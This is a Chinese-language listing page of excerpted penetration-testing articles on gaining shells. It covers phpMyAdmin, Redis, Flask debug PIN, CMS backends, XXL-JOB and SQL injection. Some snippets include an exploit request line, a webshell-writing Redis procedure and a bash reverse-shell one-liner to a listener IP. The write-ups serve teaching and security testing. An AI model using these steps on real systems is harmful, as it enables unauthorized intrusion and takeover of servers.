jjzjj

Getshell

全部标签

phpMyAdmin 未授权Getshell

前言做渗透测试的时候偶然发现,phpmyadmin少见的打法,以下就用靶场进行演示了。0x01漏洞发现环境搭建使用metasploitable2,可在网上搜索下载,搭建很简单这里不多说了。发现phpmyadmin,如果这个时候无法登陆,且也没有前台的漏洞,可以继续在这个phpmyadmin目录下做文章。发现setup0x02漏洞利用进行漏洞利用https://juejin.cn/post/7042901479388086285POST/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://inputHTTP/1.1​

【Python-flask库开启debug调试导致PIN码破解泄露getshell】

Python-flask库开启debug调试导致PIN码破解泄露getshell一、如何判断是否开启debug模式,当出现了类似如下的页面时,就是开启了debug调试模式注:不过这个时候是需要输入PIN码才可以得到交互式shell二、一些坑点注:本地的python环境,如果装了flask模块,在本地python文件路径“Lib\site-packages\werkzeug\debug”下,有一个__init__.py,这个py文件中有写PIN码的算法,只需要复制下来,改6个参数即可注意点:注:从中可以看到python3.5用的是md5算法,python3.11用的是sha1算法详情可见:[We

记录一次Redis未授权getshell几种常见方法

记录一次Redis未授权getshell几种常见方法一.redis未授权访问简介Redis默认情况下,端口是6379,默认配置无密码./redis-server使用默认配置./redis-server../redis.conf使用自定义配置造成未授权访问原因:1.未开启登录验证,并且把IP绑定到0.0.0.02.未开启登录验证,没有设置绑定IP,protected-mode关闭二.Redis未授权写入webshell利用条件已知web的绝对路径具有读写权限利用过程1.设置数据库备份目录为linux计划任务目录configsetdir/var/www/html2.写入webshell并同步保存s

常见的CMS后台getshell姿势总结

目录WordPressdedecmsaspcms南方数据企业系统phpmyadmin日志pageadmin无忧企业系统WordPress默认后台登录地址/wp-login.php  /wp-admin登录后在外观的编辑里面找一个模板,我们在404模板 (404.php)里面写入一句话后门可以蚁剑连接上传一个压缩包主题,压缩包里面有一句话木马,网站自解压后我们可以getshell dedecms默认密码为adminadmin系统默认管理路径是dede在后台的文件式管理器上传后门,目录uploads/1.php在主页模板里加上PHP代码,然后在更新主页HTML中将首页的文件名后缀改为php通过广告

实战·记一次edusrc证书站的getshell

这个漏洞总体就是逻辑缺陷+任意文件上传导致的getshell最近打算挖src积累一下经验,顺便在此平台记录更新一些自己的src实战记录,喜欢的同学可以关注。转载到任何其他平台请私信告诉我由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。听朋友说某证书改版了,刚好想换一个最后一次交漏洞,这已经是2021年了,金币还不够。今天刚好没课,准重新试试edusrc的强度顺带积累一下经验。涉及敏感内容已经高度马赛克一、先打经典站举例:这个语法简单粗暴,是我平时用过最多的了首先说一下这种语法的优与劣(个人经验,是否正确因人而异):好处可以发现

XXL-JOB 任务调度中心 后台反弹getshell

 访问漏洞场景,使用弱口令admin/123456,进入后台在任务管理处新增运行模式一定要选shell模式,其他的地方随便填  保存之后点击操作选择GLUEIDE,我们可以通过DNSlog判断一下pingxxxxx.dnslog.cn然后我们保存,然后执行一次刷新之后,出现下图情况,证明设备出网DNSLogPlatform 那我们就可以更改 GLUEIDE中的命令了,将shell反弹到我们监听的设备/bin/bash-i>&/dev/tcp/监听IP/55550>&1监听IP先进行监听,然后按照测试是否出网的时候执行一次,就将shell反弹到监听设备上了    

Bluecms后台任意修改文件getshell

0x01前言前几天在入门代码审计的时候,拿bluecms学习,偶然在百度上面找到一篇文章是写bluecms拿shell的,就学习了一下,我认为应该有部分cms也存在此漏洞,可能文章有不足的地方欢迎师傅们批评指正。0x02思路有些cms的后台有模板修改的功能,在编辑模板的时候,通过越级访问可以访问到其他目录的文件,写入一句话木马,或者其他PHP代码。0x03实战1.先通过其他手段登录后台,一般在系统设置下有模板管理功能2.在点击修改前,开始抓包,经过尝试,修改tpl_name的值,跳到上上级目录  3、这时就能随心所欲的修改啦,修改后提交,访问修改过的文件,就可以拿到shell 4、结果展示 0

渗透实战:dedeCMS任意用户密码重置到内网getshell

渗透实战:dedeCMS任意用户密码重置到内网getshell##一、简介DedeCMS是一个基于PHP和MySQL的开源CMS系统,它是国内很多网站使用的CMS系统之一。在使用DedeCMS的过程中,我们需要重视其安全性,因为安全问题可能会导致网站数据泄露、网站被黑、系统被入侵等严重后果。本文将介绍如何进行DedeCMS安全测试。1、环境准备为了进行DedeCMS安全测试,我们需要准备以下环境:一台安装了PHP和MySQL的服务器;DedeCMSV5.7SP2正式版安装包;一些常用的安全测试工具,如:BurpSuite、Nmap、御剑等。2、安装DedeCMS首先,我们需要安装DedeCMS

记一次任意文件下载到Getshell

任意文件下载(ArbitraryFileDownload)是一种常见的Web攻击技术,用于窃取服务器上任意文件的内容。攻击者利用应用程序中的漏洞,通过构造恶意请求,使应用程序将任意文件(如配置文件、敏感数据等)发送给攻击者。一旦攻击者成功利用这种漏洞,就可以从服务器上获取应用程序所拥有的任意文件,并且可以获取到这些文件的敏感信息。在日常的渗透中,看到下载功能是可以去看一下有没有该漏洞的,利用下载获取源码或数据库配置文件及系统敏感文件为后续出思路在日常渗透中,应该注重前台的每个功能点,最好做个Checklist。0x01任意文件下载1.进行测试在本次渗透中首页->资料下载->公共资料去点击该功能

【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。

前言本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件,读取文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;如果想要学习SQL注入原理以及如何进行SQL注入,我也写了一篇详细的SQL注入方法及原理链接如下【超详细】你知道什么是SQL注入吗?直到如何通过SQL注入来控制目标服务器吗?一篇文章教你sql注入漏洞的原理及方法----sql注入【上】_ANii_Aini的博客-CSDN博客SQL注入漏洞详解。包括原理,分类比如数字型,字符型,搜索型,xx型,宽字节注入,报错注入,盲注,有无回显等,各种注入payload以及产生原因等等https://b